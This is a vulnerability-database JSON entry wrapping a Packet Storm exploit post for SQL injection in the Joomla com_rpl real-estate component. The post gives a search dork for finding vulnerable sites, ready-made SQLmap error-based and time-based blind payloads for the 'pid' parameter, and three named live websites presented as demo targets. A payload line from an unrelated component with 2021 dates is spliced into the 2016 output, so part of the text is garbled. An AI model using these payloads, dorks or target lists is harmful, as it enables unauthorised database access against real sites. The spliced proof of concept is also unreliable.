DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:140196", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Joomla RPL 8.9.2 SQL Injection", "description": "", "published": "2016-12-17T00:00:00", "modified": "2016-12-17T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/140196/Joomla-RPL-8.9.2-SQL-Injection.html", "reporter": "xBADGIRL21", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-12-19T22:03:19", "viewCount": 21, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "_state": {"dependencies": 1678912935, "score": 1678911848, "epss": 1678924918}, "_internal": {"score_hash": "7f7dffe52f71a65de33c516a7b231a8b"}, "sourceHref": "https://packetstormsecurity.com/files/download/140196/joomlarpl-sql.txt", "sourceData": "`############################## \n# [xBADGIRL21] # \n# [N3W PUBLIC 3XPL0IT] # \n# _,________ # \n# 0day _T _==____() -- # \n# /##(_)-' # \n# /##/ # \n# x21 # \n############################## \n# Exploit Title : Joomla com_rpl SQL injection Vulnerability \n# Exploit Author : xBADGIRL21 \n# Dork : inurl:index.php?option=com_rpl \n# Vendor Homepage : https://www.realtyna.com \n# version : ALL \n# Tested on: [ BACKBOX] \n# MyBlog : http://xbadgirl21.blogspot.com/ \n# Date: 15/12/2016 \n# video Proof : https://www.youtube.com/watch?v=jlZ1gOM9KSk \n[*] To buy or Danate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz \n###################### \n# [+] DESCRIPTION : \n###################### \n# [+] Realtyna CRM (Client Relationship Management) Add-on \n# [+] for RPL is a Real Estate CRM specially designed and developed \n# [+] based on business process and models required by Real Estate \n# [+] AND an SQL injection has been Detected in this Joomla components \nrealtyna \n###################### \n# [+] Poc : \n###################### \n# [pid] Get Parameter Vulnerable To SQLi \n# \nhttp://127.0.0.1/index.php?option=com_rpl&view=propertyshow&pid=[SQLi]&Itemid= \n###################### \n# [+] SQLmap PoC: \n###################### \n# Parameter: pid (GET) \n# Type: error-based \n# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP \nBY clause (FLOOR) \n# Payload: option=com_rpl&view=propertyshow&pid=31825' AND (SELECT 4394 \nFROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT \n(ELT(4394=4394,1))),0x7162767a71,FLOOR(RAND(0)*2))x FROM \nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qozi&Itemid= \n# \n# Type: AND/OR time-based blind \n# Title: MySQL >= 5.0.12 AND time-based blind \n# Payload: option=com_rpl&view=propertyshow&pid=31825' AND SLEEP(5)-- \nXXKX&Itemid=load: \noption=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021 \nAND (SELECT 8657 FROM(SELECT #COUNT(*),CONCAT(0x71767a7171,(SELECT \n(ELT(8657=8657,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM \nINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) \n# --- \n# GET parameter 'pid' is vulnerable. Do you want to keep testing the others \n(if any)? [y/N] \n###################### \n# [!] Live Demo : \n###################### \n# \nhttp://www.myproperty.ae/index.php?option=com_rpl&view=propertyshow&pid=31825&Itemid= \n# \nhttp://primerealty.co.th/index.php?option=com_rpl&view=propertyshow&pid=3&Itemid \n# \nhttp://www.eprop.co.za/index.php?option=com_rpl&view=propertyshow&pid=31333&Itemid= \n###################### \n# Discovered by : xBADGIRL21 \n# Greetz : All Mauritanien Hackers - NoWhere \n###################### \n`\n"}

{}